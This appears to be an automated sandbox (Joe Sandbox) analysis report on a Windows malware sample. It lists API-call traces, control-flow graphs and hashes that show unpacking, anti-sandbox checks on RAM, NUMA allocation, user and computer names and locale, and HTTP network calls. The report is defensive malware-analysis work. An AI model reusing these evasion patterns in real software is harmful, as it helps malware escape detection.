                                                        control_flow_graph 1344 b2003c-b20047 1345 b20049 1344->1345 1346 b2004c-b20263 call b20a3f call b20e0f call b20d90 VirtualAlloc 1344->1346 1345->1346 1361 b20265-b20289 call b20a69 1346->1361 1362 b2028b-b20292 1346->1362 1367 b202ce-b203c2 VirtualProtect call b20cce call b20ce7 1361->1367 1363 b202a1-b202b0 1362->1363 1366 b202b2-b202cc 1363->1366 1363->1367 1366->1363 1373 b203d1-b203e0 1367->1373 1374 b203e2-b20437 call b20ce7 1373->1374 1375 b20439-b204b8 VirtualFree 1373->1375 1374->1373 1376 b205f4-b205fe 1375->1376 1377 b204be-b204cd 1375->1377 1380 b20604-b2060d 1376->1380 1381 b2077f-b20789 1376->1381 1379 b204d3-b204dd 1377->1379 1379->1376 1383 b204e3-b20505 1379->1383 1380->1381 1386 b20613-b20637 1380->1386 1384 b207a6-b207b0 1381->1384 1385 b2078b-b207a3 1381->1385 1395 b20517-b20520 1383->1395 1396 b20507-b20515 1383->1396 1388 b207b6-b207cb 1384->1388 1389 b2086e-b208be LoadLibraryA 1384->1389 1385->1384 1390 b2063e-b20648 1386->1390 1392 b207d2-b207d5 1388->1392 1394 b208c7-b208f9 1389->1394 1390->1381 1393 b2064e-b2065a 1390->1393 1397 b207d7-b207e0 1392->1397 1398 b20824-b20833 1392->1398 1393->1381 1399 b20660-b2066a 1393->1399 1400 b20902-b2091d 1394->1400 1401 b208fb-b20901 1394->1401 1402 b20526-b20547 1395->1402 1396->1402 1403 b207e2 1397->1403 1404 b207e4-b20822 1397->1404 1406 b20839-b2083c 1398->1406 1405 b2067a-b20689 1399->1405 1401->1400 1407 b2054d-b20550 1402->1407 1403->1398 1404->1392 1408 b20750-b2077a 1405->1408 1409 b2068f-b206b2 1405->1409 1406->1389 1410 b2083e-b20847 1406->1410 1412 b205e0-b205ef 1407->1412 1413 b20556-b2056b 1407->1413 1408->1390 1414 b206b4-b206ed 1409->1414 1415 b206ef-b206fc 1409->1415 1416 b2084b-b2086c 1410->1416 1417 b20849 1410->1417 1412->1379 1418 b2056f-b2057a 1413->1418 1419 b2056d 1413->1419 1414->1415 1420 b2074b 1415->1420 1421 b206fe-b20748 1415->1421 1416->1406 1417->1389 1424 b2059b-b205bb 1418->1424 1425 b2057c-b20599 1418->1425 1419->1412 1420->1405 1421->1420 1428 b205bd-b205db 1424->1428 1425->1428 1428->1407
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B2024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: b9ac43faf0e425f66e751f636274e19294a2a96a06a7e17410e8e14007054894
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: 72527974A11229DFDB64CF58D984BA8BBB1BF09304F1480D9E90DAB352DB30AE85DF14
                                                        Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA258), ref: 004198A1
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA228), ref: 004198BA
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA168), ref: 004198D2
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA2A0), ref: 004198EA
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA0F0), ref: 00419903
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008266D8), ref: 0041991B
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007F8640), ref: 00419933
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007F8760), ref: 0041994C
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA000), ref: 00419964
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA150), ref: 0041997C
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA0D8), ref: 00419995
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA018), ref: 004199AD
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007F84C0), ref: 004199C5
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA030), ref: 004199DE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                          • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                          • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                          • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                          • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                          • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                          • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                          • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                          • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                        • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                                        • CloseHandle.KERNEL32(?,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                        • ExitProcess.KERNEL32 ref: 00416B22
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 3511611419-0
                                                        • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                        • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                        • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                        • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                                                        Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                        • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ??2@$CrackInternetlstrlen
                                                        • String ID: <
                                                        • API String ID: 1683549937-4251816714
                                                        • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                        • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                        • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                        • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95
                                                        Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1494 401220-401247 call 4189b0 GlobalMemoryStatusEx 1497 401273-40127a 1494->1497 1498 401249-401271 call 41da00 * 2 1494->1498 1500 401281-401285 1497->1500 1498->1500 1502 401287 1500->1502 1503 40129a-40129d 1500->1503 1504 401292-401294 ExitProcess 1502->1504 1505 401289-401290 1502->1505 1505->1503 1505->1504
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                        • __aulldiv.LIBCMT ref: 00401258
                                                        • __aulldiv.LIBCMT ref: 00401266
                                                        • ExitProcess.KERNEL32 ref: 00401294
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                        • String ID: @
                                                        • API String ID: 3404098578-2766056989
                                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                                        Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1508 416af3 1509 416b0a 1508->1509 1511 416aba-416ad7 call 41aad0 OpenEventA 1509->1511 1512 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1509->1512 1517 416af5-416b04 CloseHandle Sleep 1511->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1511->1518 1517->1509 1518->1512
                                                        APIs
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                                        • CloseHandle.KERNEL32(?,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                        • ExitProcess.KERNEL32 ref: 00416B22
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                        • String ID:
                                                        • API String ID: 941982115-0
                                                        • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                        • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                        • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                        • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                        Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406303
                                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00406385
                                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                        • String ID: ERROR$ERROR
                                                        • API String ID: 3287882509-2579291623
                                                        • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                        • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                        • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                        • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                        Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocComputerNameProcess
                                                        • String ID:
                                                        • API String ID: 4203777966-0
                                                        • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                        • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                        • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                        • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                        Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                        • ExitProcess.KERNEL32 ref: 00401143
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                                        • String ID:
                                                        • API String ID: 1103761159-0
                                                        • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                        • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                        • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                        • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                        Function 007FBFC6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007FBFEE
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 007FC00E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 007FB000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7fb000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: 509a56d80a7e48d6873114e1eaf7c8e57f4f5b36413251d6bfdfd839b6610e07
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 4BF06231600719ABE7203AF59D8DA7AB6E8AF49725F100528F746911C0DB74E9468A61
                                                        Function 00B20E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000400,?,?,00B20223,?,?), ref: 00B20E19
                                                        • SetErrorMode.KERNEL32(00000000,?,?,00B20223,?,?), ref: 00B20E1E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: d3d99cc04f1a8f684d5fd2d77414d8ee9fb87755c6d3df6a29803a24b718521b
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: 21D0123154512877D7003A94DC09BCD7B5CDF09B62F008451FB0DD9081C770994047E5
                                                        Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:
                                                        • API String ID: 2087232378-0
                                                        • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                        • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                        • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                        • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                        Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                        • ExitProcess.KERNEL32 ref: 004011C6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$Process$AllocName$ComputerExitUser
                                                        • String ID:
                                                        • API String ID: 1004333139-0
                                                        • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                        • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                        • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                        • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                        Function 007FBC85 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 007FBCD6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 007FB000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7fb000_81C9.jbxd
